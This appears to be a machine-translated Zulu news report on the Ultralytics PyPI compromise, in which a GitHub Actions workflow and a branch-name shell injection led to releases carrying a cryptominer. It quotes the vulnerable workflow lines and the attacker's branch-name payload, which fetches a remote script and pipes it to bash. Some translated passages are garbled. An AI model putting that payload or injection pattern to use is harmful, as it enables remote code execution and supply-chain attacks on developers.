Abahlaseli bakwazile ukwenza ikhodi ngamalungelo okuphatha Izenzo ze-GitHub endaweni yelabhulali ye-Ultralytics Python, esetshenziselwa ukuxazulula izinkinga zokubona ngekhompyutha njengokuhlonza izinto ezithombeni nasekuhlukaniseni izithombe. Ngemva kokuthola ukufinyelela endaweni yokugcina, abahlaseli bashicilele ukukhishwa okusha kwe-Ultralytics kunkomba ye-PyPI, ehlanganisa izinguquko ezinonya zezimayini ze-cryptocurrency. Kule nyanga edlule, ilabhulali ye-Ultralytics ilandwe kukhathalogi ye-PyPI izikhathi ezingaphezu kwezigidi ezingu-6.4.
Ukuze kufakwe engcupheni ikhosombe, ubungozi busetshenziswe kuphakheji yezenzo ze-ultralytics, esetshenziselwa ukuqalisa ngokuzenzakalelayo izibambi lapho izenzo ezithile zenziwa endaweni yokugcina ku-GitHub kusetshenziswa indlela ye-GitHub Actions. Kuphrojekthi ye-ultralytics, isibambi esisengozini sasiboshelwe kumcimbi we-pull_request_target futhi sabizwa lapho izicelo ezintsha zokudonsa zifika. Ikakhulukazi, ukuze kufomethwe ikhodi ezicelweni zokudonsa ezithunyelwe, isibambi sefomethi.yml sabizwa futhi ikhodi ecaciswe esigabeni esithi “gijima” sefayela le-action.yml yasetshenziswa, equkethe imiyalo yegobolondo enamaphethini okushintsha: imvelaphi yokudonsa ye-git. ${{ github.head_ref || github.ref }} git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}"
Ngakho-ke, igama legatsha le-Git elishiwo esicelweni sokudonsa lifakwe esikhundleni semiyalo yegobolondo ngaphandle kokubaleka okufanele. Kuyaphawuleka ukuthi ngo-Agasti, iphakheji ye-ultralytics-actions isivele ilungisile ukuba sengozini okufanayo okuhlobene nokusetshenziswa kwevelu yangaphandle kumsebenzi we-echo: echo “github.event.pull_request.head.ref: ${{ github.event.pull_request .head.ref }} »
Ukuhlela ukusetshenziswa kwekhodi yabo kumongo wesibambi se-GitHub Actions, abahlaseli bathumele isicelo sokudonsa endaweni ye-ultralytics, ecacisa okulandelayo njengegama legatsha: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Ngokufanelekile, lapho isicelo sokudonsa sitholwa, iyunithi yezinhlamvu eshiwo umhlaseli ethi “$(…)” yafakwa kukhodi, okwathi, lapho isibambi sithulwa, kwaholela ekusetshenzisweni kwekhodi ethi “curl -sSfL raw.githubusercontent. com/…/file.sh | bash".
Ikhodi esebenzayo kumongo we-GitHub Actions ingase isetshenziselwe ukuthwebula ithokheni yokufinyelela yekhosombe kanye nenye idatha ebucayi. Ukuthi abahlaseli bakwazile kanjani ukukhiqiza ukukhishwa, benamandla okusebenzisa ikhodi yabo kokuthi Izenzo ze-GitHub, akukacaci okwamanje kucatshangwa ukuthi lokhu kwenzeke ngenxa yoshintsho kusibambi se-publish.yml (abahlaseli basuse ukuqinisekiswa kwesici; i-akhawunti evunyelwe ukushicilela okukhishiwe ku-PyPI) kanye nokusetshenziswa kobuchwepheshe obufaka ubuthi Izenzo ze-GitHub zakha inqolobane ukuze kufakwe idatha yakho ekukhishweni.
Ukukhishwa kokuqala okunonya kwe-Ultralytics 8.3.41 kwanyatheliswa ngabahlaseli ku-PyPI ngoDisemba 4 ngo-23:51 PM (MSK) kwasuswa ngo-12:15 PM ngosuku olulandelayo. Ngo-15:47 PM, okunye ukukhishwa, okungu-8.3.42, kwathunyelwa kwasuswa ngo-16:47 PM. Ngakho-ke, izinguqulo ezinonya zazitholakala ukuze zilandwe cishe amahora ayi-13 (i-PyPI iqopha cishe ukulandwa okungu-250 komtapo wezincwadi we-ultralytics ngosuku). Ukukhishwa okungu-8.3.41 no-8.3.42 kwakuqukethe ikhodi elandiwe kusuka ku-external iseva Ingxenye ye-XMRig yokumba imali yedijithali.
Abathuthukisi bephrojekthi balungise inkinga futhi bakha ukukhishwa kokulungisa okungu-8.3.43 no-8.3.44, kodwa ezinsukwini ezimbili kamuva okunye ukuhlasela kwenziwa, lapho abahlaseli beshicilele ukukhishwa okunonya okubili okwengeziwe namuhla ngo-04:41 no-05:27 (MSK) - 8.3.45. 8.3.46 kanye no-8.3.44, okuhlanganisa nekhodi yezimayini. Kuze kube sekupheleni kophenyo, abasebenzisi bayelulekwa ukuthi bayeke ukufaka izinguqulo ezintsha kanye nokukhululwa kokulungisa okungu-XNUMX njengokuncika.
Source: opennet.ru
